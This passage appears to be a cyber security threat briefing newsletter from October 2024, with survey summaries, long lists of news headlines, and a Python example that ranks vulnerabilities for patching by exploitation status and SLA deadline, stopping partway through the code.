Organisations often assume that adding more cyber security tools equates to better protection, yet this overconfidence can lead to blind spots. Companies with fragmented solutions are 3.5 times more likely to face major security incidents. The Uber data breach in 2022 illustrated how alert fatigue—where excessive notifications overwhelm teams—can lead to overlooked threats, even with advanced tools in place. To counter this, experts recommend streamlining cyber security systems, prioritising critical alerts, and regularly auditing security processes. Building a resilient defence isn’t about quantity but the strategic use of technology paired with continuous training and monitoring.
Gallagher Re Study Links Cyber Security Gaps to Higher Insurance Claims
Gallagher Re's recent study, using data from Bitsight and its own cyber incident records, highlights that gaps in cyber security increase the risk of incidents and insurance claims. Organisations with larger cyber footprints, such as extensive IP address networks, are particularly vulnerable, pointing to a need for insurers to consider technographic data alongside traditional metrics. The study suggests that targeted use of external scanning data could help insurers lower loss ratios by up to 16.4%, focusing on the most damaging risks. Basic cyber hygiene, including rapid patching and endpoint management, remains essential for mitigating incidents and reducing potential claims.
AI and Deepfakes Fuel Phishing Scams, Making Detection Harder
Teleport's study highlights that AI-powered impersonation and deepfake-driven phishing are now the hardest cyber threats for businesses to defend against, with 52% of respondents marking these as particularly challenging. AI has enabled cyber criminals to create highly convincing phishing scams targeting credentials, significantly lowering both the cost and skill needed to launch attacks. Despite the adoption of AI tools by 68% of organisations to combat these threats, overconfidence in AI's protective capabilities may be risky.
AI-Generated Cyber Threats Have C-Suite Leaders on Edge
AI-driven cyber attacks are becoming a major concern for senior executives, as sophisticated deepfakes and AI phishing scams pose evolving risks. A recent gathering of over 100 cyber security leaders in Silicon Valley highlighted the growing difficulty in combating AI-powered phishing attacks, with three-quarters of surveyed Fortune 500 security officers reporting significant challenges. Additionally, over half noted the increasing prevalence of deepfake audio and video impersonations. The threat is amplified by AI tools that often lack proper data governance, potentially exposing organisations to heightened risks from third-party suppliers, with predicted fraud losses in the US expected to climb to $40 billion by 2027.
The Single Biggest Vulnerability in Your Cyber Security Is You
A recent report highlights that human error accounts for 68% of successful cyber attacks, indicating it as a significant vulnerability within cyber security. Despite advances in technical defences, human-centric errors, such as skills-based and knowledge-based mistakes, persist as weak points. Current cyber security education and policy efforts focus largely on technical defences, but often overlook the psychological aspects of behaviour. Experts suggest that minimising cognitive load, fostering a positive cyber security culture, and adopting long-term strategies for behavioural change are crucial to reducing human error and building a more resilient cyber security posture.
Why Cyber Security Acumen Matters in the C-Suite
As generative AI and sophisticated cyber threats rise, the need for cyber security expertise within the C-suite has become critical. Effective leaders must balance AI-driven innovations with a strong cyber security framework to prevent potential breaches. This alignment is essential for strategic decision-making, resource allocation, and collaborative crisis response. Boards and CEOs who understand these risks are better positioned to safeguard data, intellectual property, and reputation. Regulatory expectations are increasing, and companies that prioritise cyber security acumen are better prepared to handle compliance challenges and adapt swiftly to evolving threats.
Cyber Incidents Surge, Damaging Brand Trust and Business Relationships – Hiscox
The latest Hiscox Cyber Readiness Report reveals a surge in cyber incidents, with 70% of UK organisations and 67% globally experiencing increased attacks over the past year. This rise in cyber threats is eroding brand trust and impacting business relationships. Nearly half of affected firms face challenges in attracting new customers, a sharp rise from 20% last year, with 43% reporting a loss of existing customers. Additionally, many organisations have integrated Generative AI, with over half acknowledging heightened cyber risk. Yet, a lack of expertise remains, with 37% of UK businesses underprepared to address these evolving risks.
Cyber Resilience vs Cyber Security: Which is More Critical?
Focusing on cyber resilience is increasingly essential for organisations today. Unlike traditional cyber security, which aims to prevent breaches, cyber resilience emphasises an organisation’s ability to continue operating amidst an incident. By adopting a culture of resilience, organisations can safeguard their operations, data, and reputation—even in the face of a cyber attack. Investing in resilience, beginning with people and culture, offers a strong return as it prepares businesses to adapt quickly to adversities. Moreover, in an era of heightened threats, cyber resilience is becoming a competitive advantage, enhancing trust with customers, stakeholders, and insurers.
Phishing Attacks Snare Security and IT Leaders
A recent survey by Arctic Wolf and Sapio Research highlights persistent vulnerabilities in cyber security culture, despite IT leaders’ high confidence levels. While 80% of leaders feel prepared against phishing, nearly two-thirds admitted to clicking on phishing links themselves. Moreover, 36% of IT leaders have bypassed their own security protocols, exposing organisations to heightened risks. In addition, 68% of security professionals reuse passwords, a significant lapse in cyber hygiene. To address these issues, experts advocate for personalised, behaviour-based training and a proactive reporting culture. Only 60% of firms have adopted AI policies, with just 29% of end users aware of these policies, underscoring a need for clearer communication.
CISO Role Gaining Influence as 20% Report Directly to CEOs, Finds Survey
A recent Deloitte Global survey highlights the increasing strategic importance of cyber security in business, with 20% of chief information security officers (CISOs) now reporting directly to CEOs. Covering responses from nearly 1,200 cyber leaders worldwide, the report shows CISOs are evolving from technical experts to key advisers on cross-business risk and resilience, a role intensified by the rise in AI-driven cyber threats. High-performing organisations lead in integrating AI into cyber defence, aiming for 27% better outcomes. Nearly 60% plan to increase cyber budgets, emphasising the alignment of security initiatives with broader digital investments and strategic growth.
Threat Actors Are Exploiting Vulnerabilities Faster Than Ever
Mandiant’s recent research highlights the urgent need for rapid patching as attackers are now exploiting vulnerabilities within just five days on average, a steep drop from 63 days in 2018. The study, based on 138 vulnerabilities disclosed in 2023, reveals a significant shift toward zero-day exploits, now outpacing N-day vulnerabilities. Zero-day vulnerabilities are unknown to vendors and lack available patches at the time of disclosure; N-day vulnerabilities are security flaws that have already been publicly disclosed and typically have a patch available but may remain unaddressed on systems, creating opportunities for cyber attacks. The report underscores that while patching is essential, implementation can be slow, particularly across large systems, mobile devices, or critical infrastructure where operational disruptions pose serious risks.
Employees Lack Fundamental Security Awareness
A recent Fortinet survey highlights growing concern among executives regarding employee cyber security awareness, with 70% stating their teams lack essential knowledge – a significant increase from last year. Over 60% expect a rise in employee-targeted cyber attacks leveraging AI. Positively, 80% of organisations are now more open to implementing security awareness initiatives. Nearly half of these leaders deliver training content quarterly, with phishing prevention as a top focus. The findings underline the necessity of a strong first line of defence, with targeted campaigns and accessible training vital to enhancing organisational cyber resilience.
Sources:
https://www.helpnetsecurity.com/2024/10/24/ai-impersonation-cyberattack-vector/
https://fortune.com/2024/10/24/ai-generated-cyber-threats-c-suite-cfo-leaders-edge/
https://www.sciencealert.com/the-single-biggest-vulnerability-in-your-cyber-security-is-you
https://www.darkreading.com/vulnerabilities-threats/why-cybersecurity-acumen-matters-c-suite
https://betanews.com/2024/10/18/cyber-resilience-vs-cybersecurity-which-is-more-critical/
https://securityboulevard.com/2024/10/phishing-attacks-snare-security-it-leaders/
https://www.techrepublic.com/article/threat-actors-mandiant-report-2024/
https://betanews.com/2024/10/23/employees-lack-fundamental-security-awareness/
Governance, Risk and Compliance
CISOs Concerned Over Growing Demands of Role - Security Boulevard
Lack of investment leaving firms open to cyber attack - PwC – The Irish Times
AI-generated cyber threats have C-suite leaders on edge | Fortune
Poor MFA, identity attacks dominate threat landscape in Q3 2024 | SC Media
Why Cyber Security Acumen Matters in the C-Suite
Overconfidence in Cyber Security: A Hidden Risk
Call for cyber security sea change as world looks to meet rising threats
Joe Sullivan: CEOs must be held accountable for security too | TechTarget
Cyber resilience vs. cybersecurity: Which is more critical? (betanews.com)
CISOs: Throwing Cash at Tools Isn't Helping Detect Breaches (darkreading.com)
CISO role gaining influence as 20% report directly to CEOs, finds survey
CISOs respond: 49% of CISOs plan to leave role without industry action | Security Magazine
In 2025 Security And Risk Pros Will Brace For Regulations And Resilience (forbes.com)
Gartner's 2025 tech trends show how your business needs to adapt - and fast | ZDNET
Effective strategies for measuring and testing cyber resilience - Help Net Security
Why strong cyber security means we must reduce complexity | World Economic Forum
Is the future of tech roles fractional? - BusinessCloud
Achieving peak cyber resilience - Help Net Security
68% of directors don't have a board-approved AI policy - IoD Ireland
Board Members Should Review Cyber Risk Disclosure Procedures Following SEC Enforcement
Best Cyber Security Metrics to Use in the Boardroom | Kovrr - Security Boulevard
CISO Insights: 10 modern capabilities to revamp your security | Fastly
What CIOs Must Consider With Sophos Buying Secureworks
Unclear pricing for GRC tools creates market confusion - Help Net Security
Threats
Ransomware, Extortion and Destructive Attacks
The evolution of cyber crime: How ransomware became the weapon of choice | TechRadar
Healthcare Sees 300% Surge in Ransomware Attacks
ESET partner breached to send data wipers to Israeli orgs (bleepingcomputer.com)
Ransomware Rising – Understanding, Preventing and Surviving Cyber Extortion - Security Boulevard
Akira is encrypting again after abandoning double extortion • The Register
Ransomware Gangs Use LockBit's Fame to Intimidate Victims in Latest Attacks
NotLockBit: Ransomware Discovery Serves As Wake-Up Call For Mac Users | Tripwire
A Dangerous Alliance: Scattered Spider, RansomHub Join Forces
CISA confirms Veeam vulnerability is being used in ransomware attacks (therecord.media)
NotLockBit Ransomware Can Target macOS Devices - SecurityWeek
New Qilin.B Ransomware Variant Emerges with Improved Encryption and Evasion Tactics
Government is fed up with ransomware payments fueling cyber attacks (cnbc.com)
Has BlackCat returned as Cicada3301? Maybe.
Chinese trader laundered more than $17M for Lazarus Group in 25 hacks (cointelegraph.com)
Ransomware protection: AI and strategies to combat rising threats - SiliconANGLE
Ransomware attacks against healthcare orgs is on the rise, Microsoft says (qz.com)
Ransomware is driving an increase in emergency patient care (cyberscoop.com)
Ransomware's ripples felt across ERs as care suffers • The Register
Russia recommends prison sentence for REvil hackers | SC Media
Are Leaders Ready to Break the Ransomware Cycle - Security Boulevard
What's behind the 51% drop in ransomware attacks? (securityintelligence.com)
Organisations Paying Fewer Ransoms, Building Resilience: Kaseya | MSSP Alert
Ransomware Victims
How the ransomware attack at Change Healthcare went down: A timeline | TechCrunch
Radisson’s Country Inn and Suites Allegedly Hit by Ransomware | MSSP Alert
Ransomware's ripples felt across ERs as care suffers • The Register
Henry Schein discloses data breach a year after ransomware attack
50,000 Files Exposed in Nidec Ransomware Attack - Infosecurity Magazine (infosecurity-magazine.com)
Ransomware gang stoops to new low, targets prominent nonprofit for disabled people (therecord.media)
Spate of ransomware attacks on German-speaking schools hits another in Switzerland
Crypt Ghouls Targets Russian Firms with LockBit 3.0 and Babuk Ransomware Attacks (thehackernews.com)
Phishing & Email Based Attacks
Cyber criminal underground “thriving” as weekly attacks surge by 75% in Q3 2024 | ITPro
Evolving cyber criminal tactics targeting SMBs - Help Net Security
Latrodectus Malware Increasingly Used by Cyber Criminals - SecurityWeek
Bumblebee and Latrodectus Malware Return with Sophisticated Phishing Strategies
Top open source email platform hacked to steal user details | TechRadar
AI and deepfakes fuel phishing scams, making detection harder - Help Net Security
Evolving Email Threats and How to Protect Against Them - IT Security Guru
Unknown threat actors exploit Roundcube Webmail flaw in phishing campaign (securityaffairs.com)
Threat actors increasingly using malicious virtual hard drives in phishing attacks | CSO Online
LinkedIn bots and spear phishers target job seekers | Malwarebytes
75% of US Senate Campaign Websites Fail to Implement DMARC - Infosecurity Magazine
Gophish Framework Used in Phishing Campaigns to Deploy Remote Access Trojans (thehackernews.com)
Why Phishing-Resistant MFA Is No Longer Optional: The Hidden Risks of Legacy MFA
Business Email Compromise (BEC)/Email Account Compromise (EAC)
Evolving cyber criminal tactics targeting SMBs - Help Net Security
Other Social Engineering
Experts warn North Koreans are posing as IT workers in the West
'Pig butchering': How cyber criminals target investors with fake trading apps
LinkedIn bots and spear phishers target job seekers | Malwarebytes
HYPR is latest firm to reveal hiring of fraudulent IT worker overseas | CyberScoop
Artificial Intelligence
AI-generated cyber threats have C-suite leaders on edge | Fortune
55% Of Employees Using AI At Work Have No Training On Its Risks (forbes.com)
Hackers are finding new ways to leverage AI - Help Net Security
OpenAI’s voice API can build AI agents for phone scams • The Register
New Cyber Security Warning As 1,000 Elite Hackers Embrace AI
AI and deepfakes fuel phishing scams, making detection harder - Help Net Security
AI tools are being increasingly abused to launch cyber attacks | TechRadar
AI hack: Do not give chatbots your personal data
Cyber Security Teams Largely Ignored in AI Policy Development - Infosecurity Magazine
This new AI jailbreaking technique lets hackers crack models in just three interactions | ITPro
In 2025 Security And Risk Pros Will Brace For Regulations And Resilience (forbes.com)
The rise of the machines and the growing AI identity attack surface | CSO Online
68% of directors don't have a board-approved AI policy - IoD Ireland
AI-Powered Attacks Flood Retail Websites - Infosecurity Magazine
AI honeypot hit 800K times | Cybernews
CIOs under pressure to deliver AI outcomes faster | CIO
2FA/MFA
Poor MFA, identity attacks dominate threat landscape in Q3 2024 | SC Media
Understanding the Importance of MFA: A Comprehensive Guide - Security Boulevard
QR codes are being hijacked to bypass MFA protections | TechRadar
Why Phishing-Resistant MFA Is No Longer Optional: The Hidden Risks of Legacy MFA
Malware
HM Surf macOS vuln potentially exploited by Adloader malware • The Register
Latrodectus Malware Increasingly Used by Cyber Criminals - SecurityWeek
Bumblebee and Latrodectus Malware Return with Sophisticated Phishing Strategies
Over 6,000 WordPress hacked to install plugins pushing infostealers
Over 10M+ Personal And Corporate Devices Infected By Information Stealers (cybersecuritynews.com)
Modern Malware Is Stealthier Than Older Attacks: This Is How It Stays Hidden
Netskope Reports Possible Bumblebee Loader Resurgence - Infosecurity Magazine
Sneaky Ghostpulse malware loader hides inside PNG pixels • The Register
Hackers infect thousands of WordPress sites with malware plugins | PCWorld
Perfctl malware strikes again via Docker Remote API servers • The Register
'Prometei' Botnet Spreads its Cryptojacker Worldwide (darkreading.com)
Gophish Framework Used in Phishing Campaigns to Deploy Remote Access Trojans (thehackernews.com)
Bots/Botnets
Anti-Bot Services Help Cyber Crooks Bypass Google 'Red Page' (darkreading.com)
'Prometei' Botnet Spreads its Cryptojacker Worldwide (darkreading.com)
Mobile
Google Warns of Samsung Zero-Day Exploited in the Wild - SecurityWeek
Why you should power off your phone at least once a week - according to the NSA | ZDNET
Millions of mobile app users at risk from hardcoded creds • The Register
Location tracking of phones is out of control. Here’s how to fight back. - Ars Technica
Denial of Service/DoS/DDoS
How to detect DDoS attacks | TechTarget
Military Exercises Trigger Russian DDoS Attacks on Japan (govinfosecurity.com)
Russia-Linked Hacktivists Attack Japan's Govt, Ports (darkreading.com)
Data Breaches/Leaks
Internet Archive Breached Again, Hackers Exploited Unrotated API Tokens (cybersecuritynews.com)
Cisco Confirms Security Incident After Hacker Offers to Sell Data - SecurityWeek
Insurance admin Landmark says data breach impacts 800,000 people
Cisco takes DevHub portal offline after hacker publishes stolen data (bleepingcomputer.com)
Henry Schein discloses data breach a year after ransomware attack
Millions affected in major health data breach caused by a missing password | TechRadar
Data Breach Impacts Insurer Johnson and Johnson | MSSP Alert
Omni Family Health Data Breach Impacts 470,000 Individuals - SecurityWeek
Dance Apparel Company Sued After 65,000 Customers' Data Exposed
Organised Crime & Criminal Actors
Cyber criminal underground “thriving” as weekly attacks surge by 75% in Q3 2024 | ITPro
The evolution of cyber crime: How ransomware became the weapon of choice | TechRadar
'Pig butchering': How cyber criminals target investors with fake trading apps
Russia recommends prison sentence for REvil hackers | SC Media
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Cyber Criminals Exploiting Docker API Servers for SRBMiner Crypto Mining Attacks
Chinese trader laundered more than $17M for Lazarus Group in 25 hacks (cointelegraph.com)
'Prometei' Botnet Spreads its Cryptojacker Worldwide (darkreading.com)
Fraudulent DeFi game leveraged in new crypto investor-targeted Lazarus attack | SC Media
Insider Risk and Insider Threats
The Single Biggest Vulnerability in Your Cyber Security Is You : ScienceAlert
The Enemy Within: Navigating the Evolving Landscape of (globenewswire.com)
Fortinet report: 70% of staff lack cyber security awareness
Human error is the weakest link in the cyber security chain. Here are 3 ways to fix it
Insurance
Gallagher leader warns cyber is still an emerging risk | Insurance Times
Facing the uncertainty of cyber insurance claims - Help Net Security
The future of cyber insurance: Meeting the demand for non-attack coverage - Help Net Security
Supply Chain and Third Parties
Can the cyber security industry stop history repeating? | TechRadar
Cloud/SaaS
Think You're Secure? 49% of Enterprises Underestimate SaaS Risks
Microsoft lost some customers' cloud security logs - Help Net Security
Researchers Discover Severe Security Flaws in Major E2EE Cloud Storage Providers (thehackernews.com)
Half of Organisations Have Unmanaged Long-Lived Cloud Credentials - Infosecurity Magazine
Unmanaged Cloud Credentials Pose Risk to Half of Orgs (darkreading.com)
Top open source email platform hacked to steal user details | TechRadar
Navigating the Complexities & Security Risks of Multi-cloud Management
Evolving cloud threats: Insights and recommendations - Help Net Security
Grip Security Releases 2025 SaaS Security Risks Report
Microsoft creates fake Azure tenants to pull phishers into honeypots (bleepingcomputer.com)
Outages
Can the cyber security industry stop history repeating? | TechRadar
Identity and Access Management
Poor MFA, identity attacks dominate threat landscape in Q3 2024 | SC Media
A Comprehensive Guide to Finding Service Accounts in Active Directory
What is step-up authentication & how can it help prevent financial fraud? (businesscloud.co.uk)
Encryption
What NIST's post-quantum cryptography standards mean for data security
How to fend off a quantum computer attack - Help Net Security
Linux and Open Source
Intel, AMD CPUs on Linux impacted by newly disclosed Spectre bypass (bleepingcomputer.com)
Why remove Russian maintainers of Linux kernel? Here's what Torvalds says | ZDNET
Passwords, Credential Stuffing & Brute Force Attacks
Half of Organisations Have Unmanaged Long-Lived Cloud Credentials - Infosecurity Magazine
Unmanaged Cloud Credentials Pose Risk to Half of Orgs (darkreading.com)
Top open source email platform hacked to steal user details | TechRadar
Millions of mobile app users at risk from hardcoded creds • The Register
The Key Components For a Secure Password Policy - Infosecurity Magazine (infosecurity-magazine.com)
Cisco fixes bug under exploit in brute-force attacks • The Register
Millions affected in major health data breach caused by a missing password | TechRadar
Social Media
LinkedIn bots and spear phishers target job seekers | Malwarebytes
Irish Watchdog Imposes Record €310 Million Fine on LinkedIn for GDPR Violations
What to Know About Meta’s Facial Recognition Plans | TIME
Training, Education and Awareness
55% Of Employees Using AI At Work Have No Training On Its Risks (forbes.com)
Fortinet report: 70% of staff lack cyber security awareness
Employees lack fundamental security awareness (betanews.com)
Regulations, Fines and Legislation
EU’s NIS2 Directive for cyber security resilience enters full enforcement | CSO Online
How can businesses comply with EU’s new cyber law?
NIS2’s cyber security value spreads beyond its expanded scope | CSO Online
SEC.gov | SEC Charges Four Companies With Misleading Cyber Disclosures
EU’s NIS 2 enters into force: compliance is now mandatory
SEC charges tech companies for downplaying SolarWinds breaches (bleepingcomputer.com)
Irish Watchdog Imposes Record €310 Million Fine on LinkedIn for GDPR Violations
SEC is Not Accepting Half-Truths - Security Boulevard
UK Government Introduces New Data Governance Legislation - Infosecurity Magazine
SEC SolarWinds Fines a Warning to Organisations, MSSPs | MSSP Alert
Cyber Incident Response Checklist for SEC Compliance | Troutman Pepper - JDSupra
The struggle for software liability: Inside a ‘very, very, very hard problem’ (therecord.media)
In 2025 Security And Risk Pros Will Brace For Regulations And Resilience (forbes.com)
OODA Loop - Board Members Should Review Cyber Risk Disclosure Procedures Following SEC Enforcement
Models, Frameworks and Standards
EU’s NIS2 Directive for cyber security resilience enters full enforcement | CSO Online
How can businesses comply with EU’s new cyber law?
NIS2’s cyber security value spreads beyond its expanded scope | CSO Online
EU’s NIS 2 enters into force: compliance is now mandatory
EU Adopts Cyber Resilience Act For Connected Devices
What NIST's post-quantum cryptography standards mean for data security
What is DORA – and how can Proton help with compliance? | Proton
Data Protection
Irish Watchdog Imposes Record €310 Million Fine on LinkedIn for GDPR Violations
Careers, Working in Cyber and Information Security
What even is a ‘cyber security profession’?
CISOs Concerned Over Growing Demands of Role - Security Boulevard
Cyber security leaders struggle with job stress (devx.com)
Joe Sullivan: CEOs must be held accountable for security too | TechTarget
CISOs respond: 49% of CISOs plan to leave role without industry action | Security Magazine
Making Cyber Security Accessible For Neurodiverse Talent (darkreading.com)
What's more important when hiring for cyber security roles? - Help Net Security
What I’ve learned in my first 7-ish years in cyber security
Law Enforcement Action and Take Downs
Bumblebee malware returns after recent law enforcement disruption (bleepingcomputer.com)
Misinformation, Disinformation and Propaganda
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
CISA proposes new security requirements for businesses exposed to cyber espionage | CSO Online
Nation State Actors
China
Chinese Nation-State Hackers APT41 Hit Gambling Sector for Financial Gain
Gambling sector subjected to APT41 intrusions | SC Media
Russia
Russian Intelligence Ramps Up Global Cyber Campaign, Says Western Intelligence
Former UK special forces director warns of Russian cyber-security threat - Jersey Evening Post
Russian Trolls Sow US Election Chaos (darkreading.com)
Military Exercises Trigger Russian DDoS Attacks on Japan (govinfosecurity.com)
How Russia’s Spies Hacked the Entire Nation of Georgia – BNN Bloomberg
Russian Strategic Information Attack for Catastrophic Effect
Russia-Linked Hacktivists Attack Japan's Govt, Ports (darkreading.com)
Why remove Russian maintainers of Linux kernel? Here's what Torvalds says | ZDNET
Crypt Ghouls Targets Russian Firms with LockBit 3.0 and Babuk Ransomware Attacks (thehackernews.com)
Russian Foreign Ministry reports 'large-scale' cyber attack on its resources
Russia recommends prison sentence for REvil hackers | SC Media
Iran
Iranian hackers act as brokers selling critical infrastructure access (bleepingcomputer.com)
North Korea
Experts warn North Koreans are posing as IT workers in the West
Lazarus Group Exploits Google Chrome Vulnerability to Control Infected Devices
Chinese trader laundered more than $17M for Lazarus Group in 25 hacks (cointelegraph.com)
HYPR is latest firm to reveal hiring of fraudulent IT worker overseas | CyberScoop
Cyber firm launches free tool to weed out hackers in hiring process
Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence
Sidewinder APT Deploying Expanded Attacks | MSSP Alert
Think Tanks Urge Action to Curb Misuse of Spyware and Hack-for-Hire - Infosecurity Magazine
Tools and Controls
Understanding the Importance of MFA: A Comprehensive Guide - Security Boulevard
Time to Get Strict With DMARC (darkreading.com)
55% Of Employees Using AI At Work Have No Training On Its Risks (forbes.com)
Microsoft lost some customers' cloud security logs - Help Net Security
A Business Continuity Cheat Sheet - Compare the Cloud
Can the cyber security industry stop history repeating? | TechRadar
A Comprehensive Guide to Finding Service Accounts in Active Directory
Call for cyber security sea change as world looks to meet rising threats
Fortinet report: 70% of staff lack cyber security awareness
Cyber resilience vs. cyber security: Which is more critical? (betanews.com)
CISOs: Throwing Cash at Tools Isn't Helping Detect Breaches (darkreading.com)
Multi-layered security is the key to keeping data safe – here’s why | ITPro
Effective strategies for measuring and testing cyber resilience - Help Net Security
New Research Underscores the Growing Security Risk Due to Hybrid Work Environments | Business Wire
Negating AI cyber attacks with defence in depth | TechRadar
Threat intelligence vs. threat hunting: Better together | TechTarget
API Vulnerabilities Jump 21% in Third Quarter - Security Boulevard
In 2025 Security And Risk Pros Will Brace For Regulations And Resilience (forbes.com)
68% of directors don't have a board-approved AI policy - IoD Ireland
Why Phishing-Resistant MFA Is No Longer Optional: The Hidden Risks of Legacy MFA
Achieving peak cyber resilience - Help Net Security
Cyber security incident response: Is your business prepared? | Proton
Microsoft creates fake Azure tenants to pull phishers into honeypots (bleepingcomputer.com)
Unclear pricing for GRC tools creates market confusion - Help Net Security
Five Ways To Improve Your Security Posture, Fast
Enhancing Cyber Security Post-Breach: A Comprehensive Guide - Security Boulevard
What is Third-Party Risk Monitoring in Cyber Security? | UpGuard
Other News
Acronym Overdose – Navigating the Complex Data Security Landscape (thehackernews.com)
The Rise of Cyber Attacks on Critical Infrastructure: Are You Prepared? - Security Boulevard
Why Cyber Security Should Be at the Top of the Agenda for the Utilities Sector (thefastmode.com)
The American Water cyber attack: Explaining how it happened (techtarget.com)
Security Checks: 85% of Online Shoppers Make Security a Top Priority
IT security and government services: Balancing transparency and security - Help Net Security
Vulnerability Management
Threat actors exploit zero days within 5 days, says Google's Mandiant | SC Media (scworld.com)
What is Vulnerability Management? Compliance, Challenges, & Solutions - Security Boulevard
Threat Actors Are Exploiting Vulnerabilities Faster Than Ever (techrepublic.com)
Vulnerabilities
Intel, AMD CPUs on Linux impacted by newly disclosed Spectre bypass (bleepingcomputer.com)
Microsoft launches Edge 130 with lots of security patches and feature changes - gHacks Tech News
MacOS Safari Exploit Exposes Camera, Mic, Browser Data (darkreading.com)
Researchers Discover Severe Security Flaws in Major E2EE Cloud Storage Providers (thehackernews.com)
Lazarus Group Exploits Google Chrome Vulnerability to Control Infected Devices
Atlassian Patches Vulnerabilities in Bitbucket, Confluence, Jira - SecurityWeek
Fortinet releases patches for undisclosed critical FortiManager vulnerability - Help Net Security
HM Surf macOS vuln potentially exploited by Adloader malware • The Register
Google Warns of Samsung Zero-Day Exploited in the Wild - SecurityWeek
VMware fixes critical vCenter Server RCE bug - again! (CVE-2024-38812) - Help Net Security
CISA confirms Veeam vulnerability is being used in ransomware attacks (therecord.media)
Unknown threat actors exploit Roundcube Webmail flaw in phishing campaign (securityaffairs.com)
Samsung phone users exposed to EoP attacks, Google warns • The Register
High-risk vulnerability affecting UniFi Network Server | Cybernews
CISA Warns Recent Microsoft SharePoint RCE Flaw Exploited in Attacks - SecurityWeek
Microsoft SharePoint RCE under active exploit • The Register
Cisco fixed tens of vulnerabilities, including an actively exploited one
Cisco fixes VPN DoS flaw discovered in password spray attacks
Hackers infect thousands of WordPress sites with malware plugins | PCWorld
Nvidia Patches High-Severity Flaws in Windows, Linux Graphics Drivers - SecurityWeek
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Threat Briefing 18 October 2024
Black Arrow Cyber Threat Intelligence Briefing 18 October 2024:
-70% of Senior Executives Targeted by Cyber Attack in Past 18 Months, New Study Reveals
-Defenders Must Adapt to Shrinking Exploitation Timelines
-Supply Chain Vulnerabilities are Facilitating a Surge in Ransomware
-Limited Visibility and Tool Proliferation Prevent CISOs from Detecting Breaches
-Organisations Need to Better Prepare to Recover Swiftly from Cyber Attacks, New NCSC Head Warns
-Microsoft Logs 600 million Identity Attacks Per Day as Nation-States Team Up with Cyber Criminals for Attacks
-Over 90% of Phishing Campaigns Lead Victims to Malware
-Here’s How Attackers Are Getting Around Phishing Defences
-Firm Hacked After Accidentally Hiring North Korean Cyber Criminal
-Rampant Ransom Payments Highlight Need for Urgent Action on Cyber Resiliency
-October is Cyber Security Awareness Month – It’s a Good Time to Update Your Training Programme
-Phishing Tactics: The Top Attacks Trends in 2024
Welcome to this week’s Black Arrow Cyber Threat Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Top Cyber Stories of the Last Week
70% of Senior Executives Targeted by Cyber Attack in Past 18 Months, New Study Reveals
A recent report from GetApp highlights that 70% of senior executives have been targeted by cyber attacks in the last 18 months, with AI-driven deepfakes contributing to 22% of attacks. 42% of companies overlook the risks of unsecured communication channels, and 41% fail to regularly update systems. Additionally, 28% of organisations globally do not provide specialised cyber security training for executives, leaving businesses vulnerable to evolving threats.
Defenders Must Adapt to Shrinking Exploitation Timelines
A Mandiant report reveals that the time for attackers to exploit vulnerabilities has dropped sharply to just five days in 2023, down from 32 days in 2022. Zero-day vulnerabilities, which are unknown to vendors, have been favoured over publicly known (n-day) flaws, accounting for 70% of first exploits. Despite media attention, only a portion of vulnerabilities are actively exploited. The findings emphasise the importance of rapid patching and segmented network architectures to reduce risk, as threat actors increasingly exploit vulnerabilities across diverse technologies. Effective prioritisation of patching is now more critical than ever.
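Both this summary and the earlier note on the same Mandiant report end on the same practical point: with a five-day average time-to-exploit, the order in which patches are worked matters as much as whether they are applied at all. The Python below is an added example, not code from Mandiant or from this briefing, showing one way to turn that into a patch work queue. The tiered SLA values, the placeholder finding references and the sample findings are all constructed for illustration; the report does not prescribe specific remediation targets.

```python
from dataclasses import dataclass
from datetime import date, timedelta

# Assumed remediation targets, in days after public disclosure. They are
# illustrative values chosen to sit inside the five-day average time-to-exploit
# cited above; the Mandiant report does not prescribe specific SLAs.
SLA_DAYS = {
    "exploited": 1,   # zero-day or confirmed in-the-wild exploitation
    "critical": 3,
    "high": 7,
    "medium": 30,
    "low": 90,
}
SEVERITY_RANK = {"critical": 0, "high": 1, "medium": 2, "low": 3}


@dataclass(frozen=True)
class Finding:
    ref: str               # constructed placeholder reference, not a real CVE
    severity: str          # one of SEVERITY_RANK
    disclosed: date        # date the flaw (and, for N-days, its patch) became public
    exploited: bool        # True for zero-days and anything known exploited in the wild
    internet_facing: bool  # asset reachable from the internet


def tier(f: Finding) -> str:
    """Exploited flaws get their own, tightest, tier regardless of CVSS severity."""
    return "exploited" if f.exploited else f.severity


def days_open(f: Finding, today: date) -> int:
    return (today - f.disclosed).days


def sla_due(f: Finding) -> date:
    return f.disclosed + timedelta(days=SLA_DAYS[tier(f)])


def is_overdue(f: Finding, today: date) -> bool:
    return today > sla_due(f)


def priority_key(f: Finding, today: date) -> tuple:
    """Sort key: exploited first, then internet-facing, then severity, then most overdue."""
    return (
        0 if f.exploited else 1,
        0 if f.internet_facing else 1,
        SEVERITY_RANK[f.severity],
        (sla_due(f) - today).days,  # negative means already overdue, sorts first
    )


def triage(findings, today: date) -> list[dict]:
    """Return the patch work queue in the order it should be worked."""
    ordered = sorted(findings, key=lambda f: priority_key(f, today))
    return [
        {
            "ref": f.ref,
            "tier": tier(f),
            "days_open": days_open(f, today),
            "due": sla_due(f).isoformat(),
            "overdue": is_overdue(f, today),
        }
        for f in ordered
    ]


def overdue_refs(findings, today: date) -> list[str]:
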